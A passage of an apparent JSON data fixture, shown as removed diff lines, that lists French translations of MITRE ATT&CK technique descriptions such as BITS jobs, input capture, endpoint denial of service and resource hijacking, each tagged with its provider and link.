d\u00e9fini d\u2019\u00eatre t\u00e9l\u00e9charg\u00e9 \u00e0 partir d\u2019Internet, ou obtenir une indication que vous \u00eates sur le point de vous connecter \u00e0 un site non approuv\u00e9. Les adversaires peuvent tenter de subvertir ces m\u00e9canismes de confiance. La m\u00e9thode utilis\u00e9e par les adversaires d\u00e9pendra du m\u00e9canisme sp\u00e9cifique qu\u2019ils cherchent \u00e0 subvertir. Les adversaires peuvent effectuer [Modification des autorisations de fichiers et de r\u00e9pertoire](https://attack.mitre.org/techniques/T1222) ou [Modifier le Registre](https://attack.mitre.org/techniques/T1112) \u00e0 l\u2019appui de la subversion de ces contr\u00f4les. (Citation: SpectorOps Subverting Trust septembre 2017) Les adversaires peuvent \u00e9galement cr\u00e9er ou voler des certificats de signature de code pour gagner la confiance sur les syst\u00e8mes cibles. (Citation : Certificats num\u00e9riques Securelist) (R\u00e9f\u00e9rence : Certificats num\u00e9riques Symantec)\nhttps://attack.mitre.org/techniques/T1553\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1573 - Canal chiffr\u00e9", - "description": "Les adversaires peuvent utiliser un algorithme de chiffrement connu pour dissimuler le trafic de commande et de contr\u00f4le plut\u00f4t que de s\u2019appuyer sur des protections inh\u00e9rentes fournies par un protocole de communication. Malgr\u00e9 l\u2019utilisation d\u2019un algorithme s\u00e9curis\u00e9, ces impl\u00e9mentations peuvent \u00eatre vuln\u00e9rables \u00e0 l\u2019ing\u00e9nierie inverse si des cl\u00e9s secr\u00e8tes sont cod\u00e9es et/ou g\u00e9n\u00e9r\u00e9es dans des \u00e9chantillons/fichiers de configuration de logiciels malveillants.\nhttps://attack.mitre.org/techniques/T1573\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1056 - Capture d\u2019entr\u00e9e", - "description": "Les adversaires peuvent utiliser des m\u00e9thodes de capture des entr\u00e9es utilisateur pour obtenir des informations d\u2019identification ou collecter des informations. Lors de l\u2019utilisation normale du syst\u00e8me, les utilisateurs fournissent souvent des informations d\u2019identification \u00e0 diff\u00e9rents emplacements, tels que des pages de connexion/portails ou des bo\u00eetes de dialogue syst\u00e8me. Les m\u00e9canismes de capture d\u2019entr\u00e9e peuvent \u00eatre transparents pour l\u2019utilisateur (p. ex. [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004)) ou reposent sur le fait de tromper l\u2019utilisateur pour qu\u2019il fournisse des informations sur ce qu\u2019il croit \u00eatre un service authentique (p. ex. [Web Portal Capture](https://attack.mitre.org/techniques/T1056/003)).\nhttps://attack.mitre.org/techniques/T1056\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1203 - Exploitation pour l\u2019ex\u00e9cution client", - "description": "Les adversaires peuvent exploiter les vuln\u00e9rabilit\u00e9s logicielles des applications clientes pour ex\u00e9cuter du code. Des vuln\u00e9rabilit\u00e9s peuvent exister dans les logiciels en raison de pratiques de codage non s\u00e9curis\u00e9es qui peuvent conduire \u00e0 un comportement impr\u00e9vu. Les adversaires peuvent tirer parti de certaines vuln\u00e9rabilit\u00e9s gr\u00e2ce \u00e0 une exploitation cibl\u00e9e \u00e0 des fins d\u2019ex\u00e9cution arbitraire de code. Souvent, les exploits les plus pr\u00e9cieux d\u2019une bo\u00eete \u00e0 outils offensive sont ceux qui peuvent \u00eatre utilis\u00e9s pour obtenir l\u2019ex\u00e9cution de code sur un syst\u00e8me distant, car ils peuvent \u00eatre utilis\u00e9s pour acc\u00e9der \u00e0 ce syst\u00e8me. Les utilisateurs s\u2019attendront \u00e0 voir des fichiers li\u00e9s aux applications qu\u2019ils utilisaient couramment pour travailler, ils sont donc une cible utile pour la recherche et le d\u00e9veloppement d\u2019exploits en raison de leur grande utilit\u00e9. Plusieurs types existent :### Exploitation bas\u00e9e sur un navigateurLes navigateurs Web sont une cible commune via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) et [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002). Les syst\u00e8mes de terminaux peuvent \u00eatre compromis par la navigation Web normale ou par la cible de liens dans les e-mails de spearphishing vers des sites contr\u00f4l\u00e9s par l\u2019adversaire utilis\u00e9s pour exploiter le navigateur Web. Celles-ci ne n\u00e9cessitent souvent pas d\u2019action de la part de l\u2019utilisateur pour que l\u2019exploit soit ex\u00e9cut\u00e9.### Applications OfficeLes applications bureautiques et de productivit\u00e9 courantes telles que Microsoft Office sont \u00e9galement cibl\u00e9es par [Hame\u00e7onnage](https://attack.mitre.org/techniques/T1566). Les fichiers malveillants seront transmis directement sous forme de pi\u00e8ces jointes ou via des liens pour les t\u00e9l\u00e9charger. Ceux-ci n\u00e9cessitent que l\u2019utilisateur ouvre le document ou le fichier pour que l\u2019exploit s\u2019ex\u00e9cute.### Applications tierces courantesD\u2019autres applications couramment vues ou faisant partie du logiciel d\u00e9ploy\u00e9 dans un r\u00e9seau cible peuvent \u00e9galement \u00eatre utilis\u00e9es pour l\u2019exploitation. Des applications telles qu\u2019Adobe Reader et Flash, qui sont courantes dans les environnements d\u2019entreprise, ont \u00e9t\u00e9 r\u00e9guli\u00e8rement cibl\u00e9es par des adversaires tentant d\u2019acc\u00e9der aux syst\u00e8mes. Selon le logiciel et la nature de la vuln\u00e9rabilit\u00e9, certains peuvent \u00eatre exploit\u00e9s dans le navigateur ou n\u00e9cessiter l\u2019ouverture d\u2019un fichier par l\u2019utilisateur. Par exemple, certains exploits Flash ont \u00e9t\u00e9 livr\u00e9s sous forme d\u2019objets dans des documents Microsoft Office.\nhttps://attack.mitre.org/techniques/T1203\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1570 - Transfert lat\u00e9ral d\u2019outils", - "description": "Les adversaires peuvent transf\u00e9rer des outils ou d\u2019autres fichiers entre des syst\u00e8mes dans un environnement compromis. Une fois introduits dans l\u2019environnement de la victime (c.-\u00e0-d. [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)), les fichiers peuvent ensuite \u00eatre copi\u00e9s d\u2019un syst\u00e8me \u00e0 un autre pour mettre en sc\u00e8ne des outils adversaires ou d\u2019autres fichiers au cours d\u2019une op\u00e9ration. Les adversaires peuvent copier des fichiers entre les syst\u00e8mes internes des victimes pour prendre en charge les mouvements lat\u00e9raux \u00e0 l\u2019aide de protocoles de partage de fichiers inh\u00e9rents tels que le partage de fichiers sur [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) vers des partages r\u00e9seau connect\u00e9s ou avec des connexions authentifi\u00e9es via [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001). (Citation: Unit42 LockerGoga 2019) Les fichiers peuvent \u00e9galement \u00eatre transf\u00e9r\u00e9s \u00e0 l\u2019aide d\u2019outils natifs ou autrement pr\u00e9sents sur le syst\u00e8me victime, tels que scp, rsync, curl, sftp et [ftp](https://attack.mitre.org/software/S0095).\nhttps://attack.mitre.org/techniques/T1570\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1095 - Protocole de couche non applicatif", - "description": "Les adversaires peuvent utiliser un protocole de couche non applicatif OSI pour la communication entre l\u2019h\u00f4te et le serveur C2 ou entre les h\u00f4tes infect\u00e9s au sein d\u2019un r\u00e9seau. La liste des protocoles possibles est longue. (Citation: Wikipedia OSI) Des exemples sp\u00e9cifiques incluent l\u2019utilisation de protocoles de couche r\u00e9seau, tels que le protocole ICMP (Internet Control Message Protocol), de protocoles de couche transport, tels que le protocole UDP (User Datagram Protocol), de protocoles de couche session, tels que SOCKS (Socket Secure), ainsi que de protocoles redirig\u00e9s/tunnelis\u00e9s, tels que Serial over LAN (SOL). La communication ICMP entre les h\u00f4tes en est un exemple. (Citation : Cisco Synful Knock Evolution) \u00c9tant donn\u00e9 qu\u2019ICMP fait partie de la suite de protocoles Internet, il doit \u00eatre impl\u00e9ment\u00e9 par tous les h\u00f4tes compatibles IP. (R\u00e9f\u00e9rence : Microsoft ICMP) Cependant, il n\u2019est pas aussi couramment surveill\u00e9 que d\u2019autres protocoles Internet tels que TCP ou UDP et peut \u00eatre utilis\u00e9 par des adversaires pour cacher des communications.\nhttps://attack.mitre.org/techniques/T1095\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1012 - Registre de requ\u00eates", - "description": "Les adversaires peuvent interagir avec le Registre Windows pour recueillir des informations sur le syst\u00e8me, la configuration et les logiciels install\u00e9s. Le Registre contient une quantit\u00e9 importante d\u2019informations sur le syst\u00e8me d\u2019exploitation, la configuration, les logiciels et la s\u00e9curit\u00e9. (Citation: Wikipedia Windows Registry) Les informations peuvent facilement \u00eatre interrog\u00e9es \u00e0 l\u2019aide de l\u2019utilitaire [Reg](https://attack.mitre.org/software/S0075), bien qu\u2019il existe d\u2019autres moyens d\u2019acc\u00e9der au registre. Certaines informations peuvent aider les adversaires \u00e0 poursuivre leurs op\u00e9rations au sein d\u2019un r\u00e9seau. Les adversaires peuvent utiliser les informations du [Registre des requ\u00eates](https://attack.mitre.org/techniques/T1012) lors de la d\u00e9couverte automatis\u00e9e pour fa\u00e7onner les comportements de suivi, y compris si l\u2019adversaire infecte compl\u00e8tement la cible et/ou tente des actions sp\u00e9cifiques.\nhttps://attack.mitre.org/techniques/T1012\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1030 - Limites de taille de transfert de donn\u00e9es", - "description": "Un adversaire peut exfiltrer les donn\u00e9es en morceaux de taille fixe au lieu de fichiers entiers ou limiter la taille des paquets en dessous de certains seuils. Cette approche peut \u00eatre utilis\u00e9e pour \u00e9viter de d\u00e9clencher des alertes de seuil de transfert de donn\u00e9es r\u00e9seau.\nhttps://attack.mitre.org/techniques/T1030\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1499 - D\u00e9ni de service d\u2019un point de terminaison", - "description": "Les adversaires peuvent effectuer des attaques par d\u00e9ni de service (DoS) pour d\u00e9grader ou bloquer la disponibilit\u00e9 des services pour les utilisateurs. Le DoS des points de terminaison peut \u00eatre effectu\u00e9 en \u00e9puisant les ressources syst\u00e8me sur lesquelles ces services sont h\u00e9berg\u00e9s ou en exploitant le syst\u00e8me pour provoquer une situation de blocage persistant. Les exemples de services incluent les sites Web, les services de messagerie, le DNS et les applications Web. Des adversaires ont \u00e9t\u00e9 observ\u00e9s en train de mener des attaques DoS \u00e0 des fins politiques (Citation: FireEye OpPoisonedHandover f\u00e9vrier 2016) et de soutenir d\u2019autres activit\u00e9s malveillantes, y compris la distraction (Citation: FSISAC FraudNetDoS septembre 2012), l\u2019hacktivisme et l\u2019extorsion. (R\u00e9f\u00e9rence : Symantec DDoS octobre 2014) Un DoS de point de terminaison refuse la disponibilit\u00e9 d\u2019un service sans saturer le r\u00e9seau utilis\u00e9 pour fournir l\u2019acc\u00e8s au service. Les adversaires peuvent cibler diff\u00e9rentes couches de la pile d\u2019applications h\u00e9berg\u00e9e sur le syst\u00e8me utilis\u00e9 pour fournir le service. Ces couches incluent les syst\u00e8mes d\u2019exploitation (OS), les applications serveur telles que les serveurs Web, les serveurs DNS, les bases de donn\u00e9es et les applications (g\u00e9n\u00e9ralement bas\u00e9es sur le Web) qui se trouvent au-dessus d\u2019eux. Attaquer chaque couche n\u00e9cessite diff\u00e9rentes techniques qui tirent parti des goulots d\u2019\u00e9tranglement propres aux composants respectifs. Une attaque DoS peut \u00eatre g\u00e9n\u00e9r\u00e9e par un seul syst\u00e8me ou plusieurs syst\u00e8mes r\u00e9partis sur Internet, ce qui est commun\u00e9ment appel\u00e9 DoS distribu\u00e9 (DDoS). Pour effectuer des attaques DoS contre les ressources des terminaux, plusieurs aspects s\u2019appliquent \u00e0 plusieurs m\u00e9thodes, notamment l\u2019usurpation d\u2019adresse IP et les botnets. Les adversaires peuvent utiliser l\u2019adresse IP d\u2019origine d\u2019un syst\u00e8me attaquant ou usurper l\u2019adresse IP source pour rendre le trafic d\u2019attaque plus difficile \u00e0 retracer jusqu\u2019au syst\u00e8me attaquant ou pour permettre la r\u00e9flexion. Cela peut augmenter la difficult\u00e9 des d\u00e9fenseurs \u00e0 se d\u00e9fendre contre l\u2019attaque en r\u00e9duisant ou en \u00e9liminant l\u2019efficacit\u00e9 du filtrage par adresse source sur les p\u00e9riph\u00e9riques de d\u00e9fense r\u00e9seau. Les botnets sont couramment utilis\u00e9s pour mener des attaques DDoS contre les r\u00e9seaux et les services. Les grands botnets peuvent g\u00e9n\u00e9rer une quantit\u00e9 importante de trafic \u00e0 partir de syst\u00e8mes r\u00e9partis sur l\u2019Internet mondial. Les adversaires peuvent avoir les ressources n\u00e9cessaires pour construire et contr\u00f4ler leur propre infrastructure de botnet ou peuvent louer du temps sur un botnet existant pour mener une attaque. Dans certains des pires cas pour les attaques DDoS, de nombreux syst\u00e8mes sont utilis\u00e9s pour g\u00e9n\u00e9rer des requ\u00eates que chacun n\u2019a besoin d\u2019envoyer qu\u2019une petite quantit\u00e9 de trafic pour produire suffisamment de volume pour \u00e9puiser les ressources de la cible. Dans de telles circonstances, distinguer le trafic DDoS des clients l\u00e9gitimes devient extr\u00eamement difficile. Les botnets ont \u00e9t\u00e9 utilis\u00e9s dans certaines des attaques DDoS les plus m\u00e9diatis\u00e9es, telles que la s\u00e9rie d\u2019incidents de 2012 qui a cibl\u00e9 les grandes banques am\u00e9ricaines. (Citation: USNYAG IranianBotnet Mars 2016) Dans les cas o\u00f9 la manipulation du trafic est utilis\u00e9e, il peut y avoir des points dans le r\u00e9seau mondial (tels que des routeurs de passerelle \u00e0 fort trafic) o\u00f9 les paquets peuvent \u00eatre modifi\u00e9s et amener les clients l\u00e9gitimes \u00e0 ex\u00e9cuter du code qui dirige les paquets r\u00e9seau vers une cible en volume \u00e9lev\u00e9. Ce type de fonctionnalit\u00e9 \u00e9tait auparavant utilis\u00e9 \u00e0 des fins de censure Web o\u00f9 le trafic HTTP client \u00e9tait modifi\u00e9 pour inclure une r\u00e9f\u00e9rence \u00e0 JavaScript qui g\u00e9n\u00e9rait le code DDoS pour submerger les serveurs Web cibles. (Citation: ArsTechnica Grand pare-feu de Chine) Pour les attaques tentant de saturer le r\u00e9seau fournisseur, reportez-vous \u00e0 la section [D\u00e9ni de service r\u00e9seau](https://attack.mitre.org/techniques/T1498).\nhttps://attack.mitre.org/techniques/T1499\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1614 - D\u00e9couverte de l\u2019emplacement du syst\u00e8me", - "description": "Les adversaires peuvent recueillir des informations pour tenter de calculer l\u2019emplacement g\u00e9ographique d\u2019un h\u00f4te victime. Les adversaires peuvent utiliser les informations de [D\u00e9couverte de l\u2019emplacement du syst\u00e8me](https://attack.mitre.org/techniques/T1614) pendant la d\u00e9couverte automatis\u00e9e pour fa\u00e7onner les comportements de suivi, y compris si l\u2019adversaire infecte compl\u00e8tement la cible et/ou tente des actions sp\u00e9cifiques. Les adversaires peuvent tenter de d\u00e9duire l\u2019emplacement d\u2019un syst\u00e8me \u00e0 l\u2019aide de diverses v\u00e9rifications syst\u00e8me, telles que le fuseau horaire, la disposition du clavier et/ou les param\u00e8tres de langue. (Citation: FBI Ragnar Locker 2020) (Citation : Sophos Geolocation 2016) (Citation: Bleepingcomputer RAT malware 2020) Les fonctions de l\u2019API Windows telles que GetLocaleInfoW peuvent \u00e9galement \u00eatre utilis\u00e9es pour d\u00e9terminer les param\u00e8tres r\u00e9gionaux de l\u2019h\u00f4te. (Citation: FBI Ragnar Locker 2020) Dans les environnements cloud, la zone de disponibilit\u00e9 d\u2019une instance peut \u00e9galement \u00eatre d\u00e9couverte en acc\u00e9dant au service de m\u00e9tadonn\u00e9es d\u2019instance \u00e0 partir de l\u2019instance. (Citation : Documents d\u2019identit\u00e9 d\u2019instance AWS) (Citation : Microsoft Azure Instance Metadata 2021) Les adversaires peuvent \u00e9galement tenter de d\u00e9duire l\u2019emplacement d\u2019un h\u00f4te victime \u00e0 l\u2019aide de l\u2019adressage IP, par exemple via des services de recherche IP de g\u00e9olocalisation en ligne. (Citation : Securelist Trasparent Tribe 2020) (Citation : Sophos Geolocation 2016)\nhttps://attack.mitre.org/techniques/T1614\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1197 - Emplois BITS", - "description": "Les adversaires peuvent abuser des t\u00e2ches BITS pour ex\u00e9cuter du code de mani\u00e8re persistante et effectuer diverses t\u00e2ches en arri\u00e8re-plan. Le service de transfert intelligent en arri\u00e8re-plan Windows (BITS) est un m\u00e9canisme de transfert de fichiers asynchrone \u00e0 faible bande passante expos\u00e9 via [Mod\u00e8le objet composant](https://attack.mitre.org/techniques/T1559/001) (COM). (R\u00e9f\u00e9rence : Microsoft COM) (R\u00e9f\u00e9rence : Microsoft BITS) BITS est couramment utilis\u00e9 par les mises \u00e0 jour, les messagers et d\u2019autres applications pr\u00e9f\u00e9r\u00e9es pour fonctionner en arri\u00e8re-plan (en utilisant la bande passante inactive disponible) sans interrompre les autres applications en r\u00e9seau. Les t\u00e2ches de transfert de fichiers sont impl\u00e9ment\u00e9es en tant que t\u00e2ches BITS, qui contiennent une file d\u2019attente d\u2019une ou plusieurs op\u00e9rations de fichier. L\u2019interface permettant de cr\u00e9er et de g\u00e9rer des t\u00e2ches BITS est accessible via [PowerShell](https://attack.mitre.org/techniques/T1059/001) et l\u2019outil [BITSAdmin](https://attack.mitre.org/software/S0190). (R\u00e9f\u00e9rence : Microsoft BITS) (R\u00e9f\u00e9rence : Microsoft BITSAdmin) Les adversaires peuvent abuser de BITS pour t\u00e9l\u00e9charger (par exemple, [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)), ex\u00e9cuter et m\u00eame nettoyer apr\u00e8s avoir ex\u00e9cut\u00e9 du code malveillant (par exemple, [Suppression de l\u2019indicateur](https://attack.mitre.org/techniques/T1070)). Les t\u00e2ches BITS sont autonomes dans la base de donn\u00e9es des t\u00e2ches BITS, sans nouveaux fichiers ni modifications du Registre, et souvent autoris\u00e9es par les pare-feu h\u00f4tes. (Citation : CTU BITS Malware juin 2016) (Citation: Mondok Windows PiggyBack BITS mai 2007) (R\u00e9f\u00e9rence : Symantec BITS mai 2007) L\u2019ex\u00e9cution activ\u00e9e par BITS peut \u00e9galement activer la persistance en cr\u00e9ant des t\u00e2ches de longue dur\u00e9e (la dur\u00e9e de vie maximale par d\u00e9faut est de 90 jours et extensible) ou en appelant un programme arbitraire lorsqu\u2019une t\u00e2che se termine ou entra\u00eene des erreurs (y compris apr\u00e8s le red\u00e9marrage du syst\u00e8me). (Citation: PaloAlto UBoatRAT Nov 2017) (Citation : CTU BITS Malware juin 2016) Les fonctionnalit\u00e9s de t\u00e9l\u00e9chargement BITS peuvent \u00e9galement \u00eatre utilis\u00e9es pour effectuer [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048). (Citation : CTU BITS Malware juin 2016)\nhttps://attack.mitre.org/techniques/T1197\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1132 - Encodage des donn\u00e9es", - "description": "Les adversaires peuvent encoder des donn\u00e9es pour rendre le contenu du trafic de commande et de contr\u00f4le plus difficile \u00e0 d\u00e9tecter. Les informations de commande et de contr\u00f4le (C2) peuvent \u00eatre cod\u00e9es \u00e0 l\u2019aide d\u2019un syst\u00e8me de codage de donn\u00e9es standard. L\u2019utilisation du codage de donn\u00e9es peut respecter les sp\u00e9cifications de protocole existantes et inclut l\u2019utilisation d\u2019ASCII, Unicode, Base64, MIME ou d\u2019autres syst\u00e8mes de codage binaire-texte et caract\u00e8re. (Citation: Wikipedia Binary-to-text Encoding) (Citation: Wikipedia Character Encoding) Certains syst\u00e8mes de codage de donn\u00e9es peuvent \u00e9galement entra\u00eener une compression de donn\u00e9es, tels que gzip.\nhttps://attack.mitre.org/techniques/T1132\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1598 - Hame\u00e7onnage pour obtenir des informations", - "description": "Les adversaires peuvent envoyer des messages d\u2019hame\u00e7onnage pour obtenir des informations sensibles qui peuvent \u00eatre utilis\u00e9es lors du ciblage. L\u2019hame\u00e7onnage pour obtenir des informations est une tentative d\u2019inciter les cibles \u00e0 divulguer des informations, souvent des informations d\u2019identification ou d\u2019autres informations exploitables. L\u2019hame\u00e7onnage \u00e0 des fins d\u2019information est diff\u00e9rent de [Hame\u00e7onnage](https://attack.mitre.org/techniques/T1566) en ce sens que l\u2019objectif est de recueillir des donn\u00e9es aupr\u00e8s de la victime plut\u00f4t que d\u2019ex\u00e9cuter du code malveillant. Toutes les formes d\u2019hame\u00e7onnage sont fournies par voie \u00e9lectronique d\u2019ing\u00e9nierie sociale. Le phishing peut \u00eatre cibl\u00e9, connu sous le nom de spearphishing. Dans le spearphishing, une personne, une entreprise ou une industrie sp\u00e9cifique sera cibl\u00e9e par l\u2019adversaire. Plus g\u00e9n\u00e9ralement, les adversaires peuvent effectuer des hame\u00e7onnages non cibl\u00e9s, par exemple dans le cadre de campagnes de collecte massive d\u2019informations d\u2019identification. Les adversaires peuvent \u00e9galement essayer d\u2019obtenir des informations directement par l\u2019\u00e9change de courriels, de messages instantan\u00e9s ou d\u2019autres moyens de conversation \u00e9lectronique. (Citation : Hame\u00e7onnage des m\u00e9dias sociaux ThreatPost) (Citation : TrendMictro Phishing) (Citation : PCMag FakeLogin) (R\u00e9f\u00e9rence : Sophos Attachment) (Citation : GitHub Phishery) Les victimes peuvent \u00e9galement recevoir des messages d\u2019hame\u00e7onnage qui les invitent \u00e0 appeler un num\u00e9ro de t\u00e9l\u00e9phone o\u00f9 l\u2019adversaire tente de recueillir des informations confidentielles. (Citation : Hame\u00e7onnage de rappel Avertium) L\u2019hame\u00e7onnage d\u2019informations implique souvent des techniques d\u2019ing\u00e9nierie sociale, telles que se faire passer pour une source avec une raison de collecter des informations (ex: [\u00c9tablir des comptes](https://attack.mitre.org/techniques/T1585) ou [Comptes compromis] (https://attack.mitre.org/techniques/T1586)) et/ou envoyer plusieurs messages apparemment urgents. Une autre fa\u00e7on d\u2019y parvenir est de falsifier ou d\u2019usurper (Citation: Proofpoint-spoof) l\u2019identit\u00e9 de l\u2019exp\u00e9diteur qui peut \u00eatre utilis\u00e9e pour tromper \u00e0 la fois le destinataire humain ainsi que des outils de s\u00e9curit\u00e9 automatis\u00e9s. (Citation : cyberproof-double-bounce) L\u2019hame\u00e7onnage pour obtenir de l\u2019information peut \u00e9galement faire appel \u00e0 des techniques d\u2019\u00e9vitement, comme la suppression ou la manipulation de courriels ou de m\u00e9tadonn\u00e9es/en-t\u00eates de comptes compromis utilis\u00e9s de mani\u00e8re abusive pour envoyer des messages (p. ex., [R\u00e8gles de masquage des courriels](https://attack.mitre.org/techniques/T1564/008)). (Citation : Microsoft OAuth Spam 2022) (Citation: Palo Alto Unit 42 VBA Infostealer 2014)\nhttps://attack.mitre.org/techniques/T1598\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1496 - D\u00e9tournement de ressources", - "description": "Les adversaires peuvent tirer parti des ressources des syst\u00e8mes coopt\u00e9s afin de r\u00e9soudre des probl\u00e8mes gourmands en ressources, ce qui peut avoir une incidence sur la disponibilit\u00e9 du syst\u00e8me et/ou des services h\u00e9berg\u00e9s. Un objectif commun pour le d\u00e9tournement de ressources est de valider les transactions des r\u00e9seaux de crypto-monnaie et de gagner de la monnaie virtuelle. Les adversaires peuvent consommer suffisamment de ressources syst\u00e8me pour avoir un impact n\u00e9gatif et/ou emp\u00eacher les machines affect\u00e9es de r\u00e9pondre. (Citation: Kaspersky Lazarus Under The Hood Blog 2017) Les serveurs et les syst\u00e8mes bas\u00e9s sur le cloud sont des cibles courantes en raison du potentiel \u00e9lev\u00e9 des ressources disponibles, mais les syst\u00e8mes de point de terminaison des utilisateurs peuvent \u00e9galement \u00eatre compromis et utilis\u00e9s pour le d\u00e9tournement de ressources et l\u2019extraction de crypto-monnaie. (Citation : CloudSploit - R\u00e9gions AWS inutilis\u00e9es) Les environnements conteneuris\u00e9s peuvent \u00e9galement \u00eatre cibl\u00e9s en raison de la facilit\u00e9 de d\u00e9ploiement via les API expos\u00e9es et du potentiel de mise \u00e0 l\u2019\u00e9chelle des activit\u00e9s d\u2019exploration de donn\u00e9es en d\u00e9ployant ou en compromettant plusieurs conteneurs au sein d\u2019un environnement ou d\u2019un cluster. (Citation : Unit\u00e9 42 Hildegard Malware) (Citation : API Docker expos\u00e9es \u00e0 Trend Micro) De plus, certains logiciels malveillants d\u2019extraction de crypto-monnaie identifient puis tuent les processus des logiciels malveillants concurrents pour s\u2019assurer qu\u2019ils ne sont pas en concurrence pour les ressources. (Citation: Trend Micro War of Crypto Miners) Les adversaires peuvent \u00e9galement utiliser des logiciels malveillants qui exploitent la bande passante r\u00e9seau d\u2019un syst\u00e8me dans le cadre d\u2019un botnet afin de faciliter les campagnes [Network Denial of Service](https://attack.mitre.org/techniques/T1498) et/ou de semer des torrents malveillants. (Citation : GoBotKR)\nhttps://attack.mitre.org/techniques/T1496\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1585 - \u00c9tablir des comptes", - "description": "Les adversaires peuvent cr\u00e9er et cultiver des comptes avec des services qui peuvent \u00eatre utilis\u00e9s lors du ciblage. Les adversaires peuvent cr\u00e9er des comptes qui peuvent \u00eatre utilis\u00e9s pour cr\u00e9er un personnage pour d\u2019autres op\u00e9rations. Le d\u00e9veloppement de persona consiste en le d\u00e9veloppement de l\u2019information publique, de la pr\u00e9sence, de l\u2019histoire et des affiliations appropri\u00e9es. Ce d\u00e9veloppement pourrait \u00eatre appliqu\u00e9 aux m\u00e9dias sociaux, aux sites Web ou \u00e0 d\u2019autres informations accessibles au public qui pourraient \u00eatre r\u00e9f\u00e9renc\u00e9es et examin\u00e9es pour en d\u00e9terminer la l\u00e9gitimit\u00e9 au cours d\u2019une op\u00e9ration utilisant cette personnalit\u00e9 ou cette identit\u00e9. (Citation : NEWSCASTER2014) (Citation : BlackHatRobinSage) Pour les op\u00e9rations int\u00e9grant l\u2019ing\u00e9nierie sociale, l\u2019utilisation d\u2019un personnage en ligne peut \u00eatre importante. Ces personas peuvent \u00eatre fictifs ou usurper l\u2019identit\u00e9 de personnes r\u00e9elles. Le persona peut exister sur un seul site ou sur plusieurs sites (ex: Facebook, LinkedIn, Twitter, Google, GitHub, Docker Hub, etc.). L\u2019\u00e9tablissement d\u2019un personnage peut n\u00e9cessiter l\u2019\u00e9laboration de documents suppl\u00e9mentaires pour les faire para\u00eetre r\u00e9els. Cela pourrait inclure le remplissage d\u2019informations de profil, le d\u00e9veloppement de r\u00e9seaux sociaux ou l\u2019int\u00e9gration de photos. (Citation : NEWSCASTER2014) (Citation : BlackHatRobinSage) L\u2019\u00e9tablissement de comptes peut \u00e9galement inclure la cr\u00e9ation de comptes aupr\u00e8s de fournisseurs de messagerie, qui peuvent \u00eatre directement exploit\u00e9s pour [Hame\u00e7onnage pour information](https://attack.mitre.org/techniques/T1598) ou [Hame\u00e7onnage](https://attack.mitre.org/techniques/T1566). (Citation : Mandiant APT1)\nhttps://attack.mitre.org/techniques/T1585\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1588 - Obtenir des fonctionnalit\u00e9s", - "description": "Les adversaires peuvent acheter et/ou voler des capacit\u00e9s qui peuvent \u00eatre utilis\u00e9es lors du ciblage. Plut\u00f4t que de d\u00e9velopper leurs propres capacit\u00e9s en interne, les adversaires peuvent les acheter, les t\u00e9l\u00e9charger librement ou les voler. Les activit\u00e9s peuvent inclure l\u2019acquisition de logiciels malveillants, de logiciels (y compris les licences), d\u2019exploits, de certificats et d\u2019informations relatives aux vuln\u00e9rabilit\u00e9s. Les adversaires peuvent obtenir des capacit\u00e9s pour soutenir leurs op\u00e9rations tout au long de nombreuses phases de leur cycle de vie. En plus de t\u00e9l\u00e9charger gratuitement des logiciels malveillants, des logiciels et des exploits \u00e0 partir d\u2019Internet, les adversaires peuvent acheter ces fonctionnalit\u00e9s aupr\u00e8s d\u2019entit\u00e9s tierces. Les entit\u00e9s tierces peuvent inclure des soci\u00e9t\u00e9s technologiques sp\u00e9cialis\u00e9es dans les logiciels malveillants et les exploits, des march\u00e9s criminels ou des particuliers. (Citation : NationsBuying) (Citation : PegasusCitizenLab) En plus d\u2019acheter des capacit\u00e9s, les adversaires peuvent voler des capacit\u00e9s \u00e0 des entit\u00e9s tierces (y compris d\u2019autres adversaires). Cela peut inclure le vol de licences logicielles, de logiciels malveillants, de certificats SSL/TLS et de signature de code, ou le pillage de bases de donn\u00e9es ferm\u00e9es de vuln\u00e9rabilit\u00e9s ou d\u2019exploits. (Citation : DiginotarCompromise)\nhttps://attack.mitre.org/techniques/T1588\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1569 - Services syst\u00e8me", - "description": "Les adversaires peuvent abuser des services syst\u00e8me ou des d\u00e9mons pour ex\u00e9cuter des commandes ou des programmes. Les adversaires peuvent ex\u00e9cuter du contenu malveillant en interagissant avec ou en cr\u00e9ant des services localement ou \u00e0 distance. De nombreux services sont configur\u00e9s pour s\u2019ex\u00e9cuter au d\u00e9marrage, ce qui peut aider \u00e0 atteindre la persistance ([Cr\u00e9er ou modifier un processus syst\u00e8me](https://attack.mitre.org/techniques/T1543)), mais les adversaires peuvent \u00e9galement abuser des services pour une ex\u00e9cution ponctuelle ou temporaire.\nhttps://attack.mitre.org/techniques/T1569\n", - "provider": "MITRE 